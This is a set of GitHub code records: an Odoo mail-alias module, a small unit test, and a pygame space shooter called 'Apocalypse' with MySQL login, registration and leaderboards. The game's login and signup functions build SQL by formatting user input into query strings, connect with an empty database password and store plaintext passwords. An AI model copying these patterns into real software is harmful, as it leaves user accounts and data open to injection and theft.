()\n","repo_name":"philippe-preux/philippe-preux.github.io","sub_path":"ensg/miashs/l3-ap/tps/kppv/kppv.py","file_name":"kppv.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7794859529","text":"import re\nfrom odoo.exceptions import ValidationError\nfrom odoo.tools import remove_accents\nfrom odoo import _, api, exceptions, fields, models, tools\n\nclass AliasMail(models.Model):\n _name = 'alias.mail'\n _rec_name = 'domain_name'\n \n domain_name = fields.Char(string=\"Domain Name\")\n company_id = fields.Many2one('res.company', string=\"Company\")\n\nclass Alias(models.Model):\n _inherit = \"mail.alias\"\n \n def _custom_default_alias_domain(self):\n current_user = self.env['res.users'].browse(self._context.get('uid') or self._uid or self.env.user.id)\n alias = self.env[\"alias.mail\"].sudo().search([('company_id','=',current_user.company_id.id)],limit=1)\n return alias\n \n alias_domain = fields.Many2one('alias.mail',default=lambda self:self._custom_default_alias_domain())\n# name = fields.Char(store=True)\n \n _sql_constraints = [\n ('alias_unique', 'Check(1=1)', 'Unfortunately this email alias is already used, please choose a unique one')\n ]\n \n @api.model\n def _clean_and_make_unique(self, name, alias_ids=False):\n # when an alias name appears to already be an email, we keep the local part only\n name = remove_accents(name).lower().split('@')[0]\n name = re.sub(r'[^\\w+.]+', '-', name)\n return name\n \n def name_get(self):\n \"\"\"Return the mail alias display alias_name, including the implicit\n mail catchall domain if exists from config otherwise \"New Alias\".\n e.g. `jobs@mail.odoo.com` or `jobs` or 'New Alias'\n \"\"\"\n res = []\n for record in self:\n if record.alias_name and record.alias_domain:\n res.append((record['id'], \"%s@%s\" % (record.alias_name, record.alias_domain.domain_name)))\n elif record.alias_name:\n res.append((record['id'], \"%s\" % (record.alias_name)))\n else:\n res.append((record['id'], _(\"Inactive Alias\")))\n return res\n\nclass AccountJournal(models.Model):\n _inherit = \"account.journal\"\n \n alias_domain = fields.Many2one('alias.mail',related='alias_id.alias_domain')\n \n @api.model\n def create(self, vals):\n res = super(AccountJournal, self).create(vals)\n if 'alias_domain' in vals:\n if vals.get('alias_domain'):\n res.alias_id.sudo().write({'alias_domain':vals.get('alias_domain')})\n del(vals['alias_domain'])\n else:\n alias = self.env[\"alias.mail\"].sudo().search([('company_id','=',self.env.user.company_id.id)],limit=1)\n if alias:\n res.alias_id.sudo().write({'alias_domain':alias.id})\n return res\n \n def write(self, vals):\n for journal in self:\n if 'alias_domain' in vals:\n journal.alias_id.sudo().write({'alias_domain':vals.get('alias_domain')})\n if vals.get('alias_domain'):\n del(vals['alias_domain'])\n return super(AccountJournal, self).write(vals)\n \n \n","repo_name":"xamissa/Internal","sub_path":"mail_smtp_imap_by_company/models/alias_mail.py","file_name":"alias_mail.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34207162534","text":"import unittest\nfrom bkgames.readers import TeamModel\nimport datetime\n\n\nclass TestTeamModel(unittest.TestCase):\n\n def test_add_game_for_a_team_results_in_added_game(self):\n team_model = TeamModel(\"bos\")\n date = datetime.datetime(2018, 3, 13)\n team_model.add_game(date)\n\n 
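        # a single recorded game should be stored under the right team code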
self.assertEqual(len(team_model.games), 1)\n self.assertEqual(team_model.team_code, \"bos\")\n\n def test_add_two_games_assigns_games_to_proper_teams(self):\n team_model = TeamModel(\"tor\")\n team_model.add_game(datetime.datetime(2018, 3, 13))\n team_model.add_game(datetime.datetime(2018, 3, 15))\n\n self.assertEqual(len(team_model.games), 2)\n # Games are sorted by date ascending\n self.assertGreater(team_model.games[-1], team_model.games[0])\n","repo_name":"michalurbanski/bkgames","sub_path":"tests/reader/test_team_model.py","file_name":"test_team_model.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40409533072","text":"# \nimport pygame\nimport random\nimport sys\nfrom os import path\nimport time\n\n# \n\n# \nwon = False\nabout = False\npaused = False\ndead = False\nintro = True\ngear = False\ntarget = False\nskin1 = False\nskin2 = False\nskin3 = False\nchoiced_player_image = 0\nauthorization_procedure = True\nsy = 1\nsx = 3\npts = 0\nvolume = 0\nneed = 100\nshootlimit = 9\nmeteors = 8\n# \n\n# \npygame.font.init()\nsmalltext = pygame.font.SysFont(\"comicsansms\", 25)\nmediumtext = pygame.font.SysFont(\"comicsansms\", 50)\nsmallmediumtext = pygame.font.SysFont(\"comicsansms\", 35)\nlargetext = pygame.font.SysFont(\"comicsansms\", 75)\n# \n\n# \nimg_dir = path.join(path.dirname(__file__), 'img')\nWIDTH = 480\nHEIGHT = 600\nFPS = 60\n# \n\n# \nGRAY = (75, 75, 75)\nGRAY2 = (65, 65, 65)\nGRAY_SELECTION = (40, 40, 50)\nGRAY_SELECTION2 = (50, 50, 60)\nGRAY_SELECTION3 = (40, 40, 50)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nD_RED = (200, 0, 0)\nGREEN = (0, 255, 0)\nD_GREEN = (0, 200, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nLIGHT_BLUE = (0, 160, 255)\n# \n\n# \npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Apocalypse\")\nclock = pygame.time.Clock()\n# \n\n# \ncrash_sound = pygame.mixer.Sound(\"crash.wav\")\ncrash_sound.set_volume(0.08 * (0.01 * volume))\npygame.mixer.music.load(\"purpleheart.mp3\")\npygame.mixer.music.set_volume(0.2 * (0.01 * volume))\nlaser_sound = pygame.mixer.Sound(\"laser2.wav\")\nlaser_sound.set_volume(0.1 * (0.01 * volume))\npygame.mixer.music.play(-1)\nplayer_crashed = pygame.mixer.Sound(\"player_crash.wav\")\nplayer_crashed.set_volume(0.3 * (0.01 * volume))\n\n# \n\n# \nbackground = pygame.image.load(path.join(img_dir, \"starfield.png\")).convert()\nmenu_background = pygame.image.load(path.join(img_dir, \"71.jpg\")).convert()\nplayer_img = pygame.image.load(path.join(img_dir, \"playerShip1_blue.png\")).convert()\nplayer_img2 = pygame.image.load(path.join(img_dir, \"playerShip2_blue.png\")).convert()\nplayer_img3 = pygame.image.load(path.join(img_dir, \"playerShip3_blue.png\")).convert()\nmeteor_img = pygame.image.load(path.join(img_dir, \"meteorBrown_med1.png\")).convert()\nbullet_img = pygame.image.load(path.join(img_dir, \"laserRed16.png\")).convert()\ngame_over_img = pygame.image.load(path.join(img_dir, \"68.jpg\")).convert()\nabout_img = pygame.image.load(path.join(img_dir, \"about.png\")).convert()\nlock_img = pygame.image.load(path.join(img_dir, \"lock.png\")).convert()\n\npts_img = pygame.transform.scale(pygame.image.load(path.join(img_dir, \"pts.png\")).convert(), (30, 30))\np2_img = pygame.transform.scale(pygame.image.load(path.join(img_dir, \"silver2.png\")).convert(), (30, 30))\np3_img = pygame.transform.scale(pygame.image.load(path.join(img_dir, 
\"bronze3.png\")).convert(), (30, 30))\np1_img = pygame.transform.scale(pygame.image.load(path.join(img_dir, \"gold1.png\")).convert(), (30, 30))\npygame.transform.scale(lock_img, (50, 35))\nabout_img_rect = about_img.get_rect()\ngame_over_img_rect = game_over_img.get_rect()\nmenu_background_rect = menu_background.get_rect()\nbackground_rect = background.get_rect()\nexplosion_anim = {}\nexplosion_anim[\"lg\"] = []\nexplosion_anim[\"sm\"] = []\n\n\n# \n\n\ndef menu():\n global gear\n global about\n global dead\n global intro\n global pts\n global running\n global paused\n global authorization_procedure\n select_1 = False\n select_2 = False\n select_3 = False\n select_4 = False\n authorization_procedure = False\n intro = True\n first_select = False\n pts_img.set_colorkey(BLACK)\n while intro:\n\n screen.blit(menu_background, menu_background_rect)\n menu_text = mediumtext.render(\"Apocalypse\", True, LIGHT_BLUE)\n\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if 302 >= mouse[0] >= 180 and 200 >= mouse[1] >= 155:\n first_select = False\n select_1 = True\n select_2 = False\n select_3 = False\n select_4 = False\n elif first_select is False:\n select_1 = False\n\n if 380 >= mouse[0] >= 115 and 285 >= mouse[1] >= 245:\n first_select = False\n select_1 = False\n select_2 = True\n select_3 = False\n select_4 = False\n elif first_select is False:\n select_2 = False\n\n if 315 >= mouse[0] >= 170 and 377 >= mouse[1] >= 340:\n first_select = False\n select_1 = False\n select_2 = False\n select_3 = True\n select_4 = False\n elif first_select is False:\n select_3 = False\n\n if 358 >= mouse[0] >= 128 and 547 >= mouse[1] >= 510:\n first_select = False\n select_1 = False\n select_2 = False\n select_4 = True\n select_3 = False\n elif first_select is False:\n select_4 = False\n\n if select_1 is False:\n Play = mediumtext.render(\"PLAY\", True, LIGHT_BLUE)\n screen.blit(Play, [180, 140])\n else:\n Play = mediumtext.render(\"PLAY\", True, BLUE)\n screen.blit(Play, [180, 140])\n\n if select_2 is False:\n gears = mediumtext.render(\"SETTINGS\", True, LIGHT_BLUE)\n screen.blit(gears, [110, 230])\n else:\n gears = mediumtext.render(\"SETTINGS\", True, BLUE)\n screen.blit(gears, [110, 230])\n\n if select_3 is False:\n quit = mediumtext.render(\"QUIT\", True, LIGHT_BLUE)\n screen.blit(quit, [170, 320])\n else:\n quit = mediumtext.render(\"QUIT\", True, BLUE)\n screen.blit(quit, [170, 320])\n\n if select_4 is False:\n stats_text = mediumtext.render(\"Statistics\", True, LIGHT_BLUE)\n screen.blit(stats_text, [125, 490])\n else:\n stats_text = mediumtext.render(\"Statistics\", True, BLUE)\n screen.blit(stats_text, [125, 490])\n\n screen.blit(menu_text, [110, 0])\n\n screen.blit(pts_img, [417, 150])\n\n if 447 >= mouse[0] >= 417 and 180 >= mouse[1] >= 150:\n pygame.draw.rect(screen, BLUE, ((411, 145), (41, 40)), 3)\n if click[0] == 1:\n ladders()\n else:\n pygame.draw.rect(screen, LIGHT_BLUE, ((411, 145), (41, 40)), 3)\n\n for event in pygame.event.get():\n # print(event)\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if select_1:\n intro = False\n inventory()\n\n elif select_3:\n quit()\n pygame.quit()\n else:\n intro = True\n running = False\n\n if select_4:\n player_statistics()\n\n if select_2:\n gear = True\n settings()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_TAB:\n if first_select:\n if select_1:\n select_1, select_2 = select_2, select_1\n elif select_2:\n select_2, select_3 = select_3, 
select_2\n elif select_3:\n select_3, select_4 = select_4, select_3\n elif select_4:\n select_4, select_1 = select_1, select_4\n\n if not first_select:\n select_1 = True\n first_select = True\n if event.key == pygame.K_RETURN:\n if select_1:\n intro = False\n inventory()\n\n elif select_2:\n gear = True\n settings()\n elif select_3:\n quit()\n pygame.quit()\n elif select_4:\n player_statistics()\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef auth(name, password_field):\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"SELECT login, user_password, nickname FROM players where login = ('{}') and\" \\\n \" user_password = ('{}')\".format(name, password_field)\n cursor.execute(query)\n row = cursor.fetchone()\n if row is not None:\n\n player.nickname = row[2]\n cnx.close()\n return True\n else:\n cnx.close()\n return False\n\n\ndef sign(nickname, name, password_field):\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"INSERT INTO players(nickname, login, user_password) VALUES('{}', '{}', '{}')\".format(\n nickname, name, password_field)\n\n try:\n cursor.execute(query)\n except mysql.connector.errors.IntegrityError:\n return False\n queries = [\"INSERT INTO daily_current_ladder(user_nickname, user_max_daily_points) VALUES('{}', 0)\",\n \"INSERT INTO weekly_current_ladder(user_nickname, user_max_weekly_points) VALUES('{}', 0)\",\n \"INSERT INTO monthly_current_ladder(user_nickname, user_max_monthly_points) VALUES('{}', 0)\",\n \"INSERT INTO daily_past_ladder(user_nickname, user_past_daily_points) VALUES('{}', 0)\",\n \"INSERT INTO weekly_past_ladder(user_nickname, user_past_weekly_points) VALUES('{}', 0)\",\n \"INSERT INTO monthly_past_ladder(user_nickname, user_past_monthly_points) VALUES('{}', 0)\",\n \"INSERT INTO inventory(user_nickname, space_ship2, space_ship3) VALUES('{}', false, false)\",\n \"INSERT INTO statistics(user_nickname, max_points, total_points, games_played, max_daily_points, \"\n \"max_weekly_points, max_monthly_points) VALUES('{}', 0, 0, 0, 0, 0, 0)\"]\n for elem in queries:\n cursor.execute(elem.format(nickname))\n\n cnx.commit()\n cnx.close()\n return True\n\n\ndef update_stats(points):\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"UPDATE statistics SET total_points = total_points + %s WHERE user_nickname = %s\"\n query2 = \"UPDATE statistics SET games_played = games_played + 1 WHERE user_nickname = %(nick)s\"\n query3 = \"SELECT max_points, max_daily_points, max_weekly_points, max_monthly_points FROM statistics WHERE \" \\\n \"user_nickname = %(nick)s\"\n\n params = {'nick': player.nickname}\n data2 = (points, player.nickname)\n cursor.execute(query, data2)\n cursor.execute(query2, params)\n cursor.execute(query3, params)\n row = cursor.fetchone()\n\n if row[0] < points:\n cursor.execute(\"UPDATE statistics SET max_points = %s WHERE user_nickname = %s\", data2)\n if points >= 1000:\n cursor.execute(\"UPDATE inventory SET space_ship3 = %s WHERE user_nickname = %s\", (1, player.nickname))\n elif points >= 350:\n cursor.execute(\"UPDATE inventory SET space_ship2 = %s WHERE user_nickname = %s\", (1, player.nickname))\n\n if row[1] < points:\n cursor.execute(\"UPDATE statistics SET max_daily_points = %s WHERE 
user_nickname = %s\", data2)\n cursor.execute(\"UPDATE daily_current_ladder SET user_max_daily_points = %s WHERE user_nickname = %s\", data2)\n if row[2] < points:\n cursor.execute(\"UPDATE statistics SET max_weekly_points = %s WHERE user_nickname = %s\", data2)\n cursor.execute(\"UPDATE weekly_current_ladder SET user_max_weekly_points = %s WHERE user_nickname = %s\", data2)\n if row[3] < points:\n cursor.execute(\"UPDATE statistics SET max_monthly_points = %s WHERE user_nickname = %s\", data2)\n cursor.execute(\"UPDATE weekly_current_ladder SET user_max_monthly_points = %s WHERE user_nickname = %s\", data2)\n\n cnx.commit()\n cnx.close()\n\n\ndef show_stats():\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"SELECT max_points, total_points, games_played, max_daily_points, max_weekly_points, max_monthly_points\" \\\n \" FROM statistics WHERE user_nickname = %(nick)s\"\n params = {'nick': player.nickname}\n cursor.execute(query, params)\n row = cursor.fetchone()\n cnx.close()\n return row\n\n\ndef authorization_window():\n latency = 0\n name = \"\"\n password_field = \"\"\n selection_1 = False\n selection_2 = False\n need_to_start = False\n need_to_quit = False\n start_latency = False\n wrong_data = False\n need_to_reg = False\n while authorization_procedure is True:\n screen.fill(GRAY)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n authorization_text = mediumtext.render(\"Authorization\", True, WHITE)\n login_text = smalltext.render(\"Username\", True, WHITE)\n password_text = smalltext.render(\"Password\", True, WHITE)\n text_log_in = smalltext.render(\"Log in\", True, WHITE)\n text_cancel = smalltext.render(\"Cancel\", True, WHITE)\n text_sign_in = smalltext.render(\"Sign in\", True, WHITE)\n invalid_data = smalltext.render(\"Wrong password or login\", True, RED)\n screen.blit(authorization_text, (75, 0))\n screen.blit(login_text, (25, 143))\n screen.blit(password_text, (25, 215))\n\n username_text = smalltext.render(name, True, WHITE)\n password_field_text = smalltext.render(password_field, True, WHITE)\n hidden_password_text = smalltext.render(\"*\" * len(password_field), True, WHITE)\n\n screen.blit(username_text, (155, 143))\n screen.blit(hidden_password_text, (155, 212))\n\n pygame.draw.rect(screen, WHITE, (150, 143, 315, 38), 3)\n pygame.draw.rect(screen, WHITE, (150, 215, 315, 38), 3)\n\n pygame.draw.rect(screen, WHITE, (50, 315, 100, 45), 3)\n # pygame.draw.rect(screen, BLACK, (53, 318, 94, 39), 3)\n\n pygame.draw.rect(screen, WHITE, (225, 315, 100, 45), 3)\n # pygame.draw.rect(screen, BLACK, (228, 318, 94, 39), 3)\n\n pygame.draw.rect(screen, WHITE, (355, 315, 100, 45), 3)\n\n if 465 > mouse[0] > 150 and 181 > mouse[1] > 143 and click[0] == 1:\n selection_1 = True\n selection_2 = False\n elif 465 > mouse[0] > 150 and 181 + 73 > mouse[1] > 143 + 73 and click[0] == 1:\n selection_2 = True\n selection_1 = False\n elif click[0] == 1:\n selection_1 = False\n selection_2 = False\n\n if 150 > mouse[0] > 50 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION, (52, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if auth(name, password_field) is True:\n need_to_start = True\n start_latency = True\n else:\n wrong_data = True\n elif 325 > mouse[0] > 225 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION, (227, 317, 
96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n start_latency = True\n need_to_quit = True\n elif 450 > mouse[0] > 360 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION, (357, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n start_latency = True\n need_to_reg = True\n screen.blit(text_log_in, (65, 315))\n screen.blit(text_cancel, (236, 316))\n screen.blit(text_sign_in, (365, 315))\n\n if wrong_data is True:\n screen.blit(invalid_data, (25, 260))\n\n if start_latency is True:\n latency += 1\n\n if latency == 7:\n latency = 0\n if need_to_start:\n menu()\n elif need_to_quit:\n pygame.quit()\n quit()\n elif need_to_reg:\n registration_window()\n\n if selection_1 is True:\n pygame.draw.rect(screen, GRAY_SELECTION, (147, 140, 321, 44), 3)\n if selection_2 is True:\n pygame.draw.rect(screen, GRAY_SELECTION, (147, 212, 321, 44), 3)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_TAB:\n selection_2, selection_1 = selection_1, selection_2\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n name) < 15 and selection_1 is True:\n name += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_1 is True:\n name = name[:-1]\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n password_field) < 15 and selection_2 is True:\n password_field += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_2 is True:\n password_field = password_field[:-1]\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef registration_window():\n latency = 0\n name = \"\"\n password_field = \"\"\n nickname = \"\"\n selection_3 = False\n selection_1 = False\n selection_2 = False\n need_to_quit = False\n start_latency = False\n need_to_reg = False\n wrong_data = False\n need_to_back = False\n while authorization_procedure is True:\n screen.fill(GRAY2)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n registration_text = mediumtext.render(\"Registration\", True, WHITE)\n nickname_text = smalltext.render(\"Nickname\", True, WHITE)\n login_text = smalltext.render(\"Username\", True, WHITE)\n password_text = smalltext.render(\"Password\", True, WHITE)\n text_sign_in = smalltext.render(\"Sign in\", True, WHITE)\n text_cancel = smalltext.render(\"Cancel\", True, WHITE)\n text_back = smalltext.render(\"Back\", True, WHITE)\n invalid_data = smalltext.render(\"This login has already been taken\", True, RED)\n screen.blit(registration_text, (102, -10))\n screen.blit(login_text, (25, 143))\n screen.blit(password_text, (25, 215))\n screen.blit(nickname_text, (25, 71))\n nickname_text_writeble = smalltext.render(nickname, True, WHITE)\n username_text = smalltext.render(name, True, WHITE)\n password_field_text = smalltext.render(password_field, True, WHITE)\n hidden_password_text = smalltext.render(\"*\" * len(password_field), True, WHITE)\n\n screen.blit(nickname_text_writeble, (155, 143 - (212 - 140)))\n screen.blit(username_text, (155, 143))\n screen.blit(hidden_password_text, (155, 212))\n\n pygame.draw.rect(screen, WHITE, (150, 143, 315, 38), 3)\n pygame.draw.rect(screen, WHITE, (150, 215, 315, 38), 3)\n pygame.draw.rect(screen, WHITE, (150, 71, 315, 38), 3)\n\n pygame.draw.rect(screen, WHITE, (50, 315, 100, 45), 3)\n # pygame.draw.rect(screen, BLACK, (53, 318, 
94, 39), 3)\n\n pygame.draw.rect(screen, WHITE, (225, 315, 100, 45), 3)\n # pygame.draw.rect(screen, BLACK, (228, 318, 94, 39), 3)\n\n pygame.draw.rect(screen, WHITE, (355, 315, 100, 45), 3)\n\n if 465 > mouse[0] > 150 and 181 > mouse[1] > 143 and click[0] == 1:\n selection_1 = False\n selection_2 = True\n selection_3 = False\n elif 465 > mouse[0] > 150 and 181 + 73 > mouse[1] > 143 + 73 and click[0] == 1:\n selection_2 = False\n selection_1 = False\n selection_3 = True\n elif 465 > mouse[0] > 150 and 181 + 73 > mouse[1] > 143 - 73 and click[0] == 1:\n selection_2 = False\n selection_1 = True\n selection_3 = False\n elif click[0] == 1:\n selection_3 = False\n selection_1 = False\n selection_2 = False\n\n if 150 > mouse[0] > 50 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION2, (52, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if sign(nickname, name, password_field) is True:\n need_to_reg = True\n start_latency = True\n else:\n wrong_data = True\n elif 325 > mouse[0] > 225 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION2, (227, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n start_latency = True\n need_to_quit = True\n elif 450 > mouse[0] > 360 and 315 < mouse[1] < 360 and click[0] == 1:\n pygame.draw.rect(screen, GRAY_SELECTION2, (357, 317, 96, 41))\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n start_latency = True\n need_to_back = True\n screen.blit(text_sign_in, (60, 315))\n screen.blit(text_cancel, (236, 316))\n screen.blit(text_back, (375, 315))\n\n if wrong_data is True:\n screen.blit(invalid_data, (25, 260))\n\n if start_latency is True:\n latency += 1\n\n if latency == 7:\n latency = 0\n if need_to_reg:\n authorization_window()\n elif need_to_quit:\n pygame.quit()\n quit()\n elif need_to_back:\n authorization_window()\n\n if selection_1 is True:\n pygame.draw.rect(screen, GRAY_SELECTION3, (147, 68, 321, 44), 3)\n if selection_2 is True:\n pygame.draw.rect(screen, GRAY_SELECTION3, (147, 140, 321, 44), 3)\n if selection_3 is True:\n pygame.draw.rect(screen, GRAY_SELECTION3, (147, 212, 321, 44), 3)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_TAB:\n if selection_1:\n selection_2, selection_1 = selection_1, selection_2\n elif selection_2:\n selection_3, selection_2 = selection_2, selection_3\n elif selection_3:\n selection_3, selection_1 = selection_1, selection_3\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n nickname) < 15 and selection_1 is True:\n nickname += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_1 is True:\n nickname = nickname[:-1]\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n name) < 15 and selection_2 is True:\n name += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_2 is True:\n name = name[:-1]\n\n if (event.unicode.isalpha() or event.unicode.isdigit() or event.unicode == '_') and len(\n password_field) < 15 and selection_3 is True:\n password_field += event.unicode\n elif event.key == pygame.K_BACKSPACE and selection_3 is True:\n password_field = password_field[:-1]\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef died():\n global sx\n global sy\n global dead\n dead = True\n 
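    # reset sx and sy to their starting values, then show the game-over screen for 45 frames (about 3 seconds at 15 FPS) before returning to the menu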
sy = 1\n sx = 3\n timer = 0\n while dead:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n screen.blit(game_over_img, game_over_img_rect)\n killed = largetext.render(\"YOU DIED\", True, RED)\n screen.blit(killed, [55, 100])\n pygame.display.update()\n clock.tick(15)\n timer += 1\n if timer == 45:\n menu()\n\n\ndef pause():\n global paused\n global running\n global gear\n running = False\n paused = True\n while paused:\n screen.fill(GRAY)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if 344 >= mouse[0] >= 139 and 200 >= mouse[1] >= 155:\n play = mediumtext.render(\"RESUME\", True, BLUE)\n screen.blit(play, [136, 140])\n else:\n play = mediumtext.render(\"RESUME\", True, LIGHT_BLUE)\n screen.blit(play, [136, 140])\n\n if 380 >= mouse[0] >= 120 and 285 >= mouse[1] >= 245:\n gears = mediumtext.render(\"SETTINGS\", True, BLUE)\n screen.blit(gears, [110, 230])\n else:\n gears = mediumtext.render(\"SETTINGS\", True, LIGHT_BLUE)\n screen.blit(gears, [110, 230])\n if 315 >= mouse[0] >= 170 and 377 >= mouse[1] >= 340:\n About = mediumtext.render(\"MENU\", True, BLUE)\n screen.blit(About, [170, 320])\n else:\n About = mediumtext.render(\"MENU\", True, LIGHT_BLUE)\n screen.blit(About, [170, 320])\n\n pause_text = mediumtext.render(\"Game is Paused\", True, YELLOW)\n screen.blit(pause_text, [65, 0])\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n paused = False\n running = True\n\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if 344 >= mouse[0] >= 139 and 200 >= mouse[1] >= 155:\n paused = False\n running = True\n\n if 380 >= mouse[0] >= 120 and 285 >= mouse[1] >= 245:\n settings()\n\n if 315 >= mouse[0] >= 170 and 377 >= mouse[1] >= 340:\n paused = False\n menu()\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef skin_check():\n global skin1\n global skin2\n global skin3\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n query = \"SELECT space_ship2, space_ship3 FROM inventory WHERE \" \\\n \"user_nickname = %(nick)s\"\n cursor.execute(query, {'nick': player.nickname})\n row = cursor.fetchone()\n if row[0] == 1:\n skin2 = True\n if row[1] == 1:\n skin3 = True\n skin1 = True\n\n\ndef ladders_check():\n import mysql.connector\n cnx = mysql.connector.connect(user='regular_player', password='', host='127.0.0.1', database='apocalypse')\n cursor = cnx.cursor()\n self_daily = \"SELECT max_daily_points FROM statistics WHERE user_nickname = %(nick)s\"\n self_past_daily = \"SELECT user_past_daily_points FROM daily_past_ladder WHERE user_nickname = %(nick)s\"\n self_weekly = \"SELECT max_weekly_points FROM statistics WHERE user_nickname = %(nick)s\"\n self_past_weekly = \"SELECT user_past_weekly_points FROM weekly_past_ladder WHERE user_nickname = %(nick)s\"\n self_monthly = \"SELECT max_monthly_points FROM statistics WHERE user_nickname = %(nick)s\"\n self_past_monthly = \"SELECT user_past_monthly_points FROM monthly_past_ladder WHERE user_nickname = %(nick)s\"\n self_data = {'nick': player.nickname}\n max_daily = \"SELECT user_nickname, max_daily_points FROM statistics ORDER BY max_daily_points DESC LIMIT 5\"\n max_past_daily = \"SELECT user_nickname, user_past_daily_points FROM daily_past_ladder ORDER BY \" \\\n \"user_past_daily_points DESC LIMIT 5\"\n max_weekly = \"SELECT user_nickname, 
max_weekly_points FROM statistics ORDER BY max_weekly_points DESC LIMIT 5\"\n max_past_weekly = \"SELECT user_nickname, user_past_weekly_points FROM weekly_past_ladder ORDER BY \" \\\n \"user_past_weekly_points DESC LIMIT 5\"\n max_monthly = \"SELECT user_nickname, max_monthly_points FROM statistics ORDER BY max_monthly_points DESC LIMIT 5\"\n max_past_monthly = \"SELECT user_nickname, user_past_monthly_points FROM monthly_past_ladder ORDER BY \" \\\n \"user_past_monthly_points DESC LIMIT 5\"\n cursor.execute(self_daily, self_data)\n self_d = cursor.fetchone()\n cursor.execute(self_past_daily, self_data)\n self_pd = cursor.fetchone()\n\n cursor.execute(self_weekly, self_data)\n self_w = cursor.fetchone()\n cursor.execute(self_past_weekly, self_data)\n self_pw = cursor.fetchone()\n\n cursor.execute(self_monthly, self_data)\n self_m = cursor.fetchone()\n cursor.execute(self_past_monthly, self_data)\n self_pm = cursor.fetchone()\n\n cursor.execute(max_daily)\n top5_d = cursor.fetchall()\n cursor.execute(max_past_daily)\n top5past_d = cursor.fetchall()\n\n cursor.execute(max_weekly)\n top5_w = cursor.fetchall()\n cursor.execute(max_past_weekly)\n top5past_w = cursor.fetchall()\n\n cursor.execute(max_monthly)\n top5_m = cursor.fetchall()\n cursor.execute(max_past_monthly)\n top5past_m = cursor.fetchall()\n\n print(self_past_daily, self_past_weekly, self_past_monthly)\n cnx.close()\n return self_d, self_m, self_w, top5_d, top5_w, top5_m, self_pd, self_pw, self_pm, \\\n top5past_d, top5past_w, top5past_m\n\n\ndef inventory():\n global running\n global intro\n skin_choice = True\n skin_check()\n select1 = False\n select2 = False\n select3 = False\n select4 = False\n select5 = False\n global dead\n global pts\n global choiced_player_image\n while skin_choice:\n screen.fill(GRAY)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n choose_text = mediumtext.render(\"Select the ship\", True, WHITE)\n start_text = mediumtext.render(\"Start\", True, WHITE)\n back_text = mediumtext.render(\"Back\", True, WHITE)\n\n 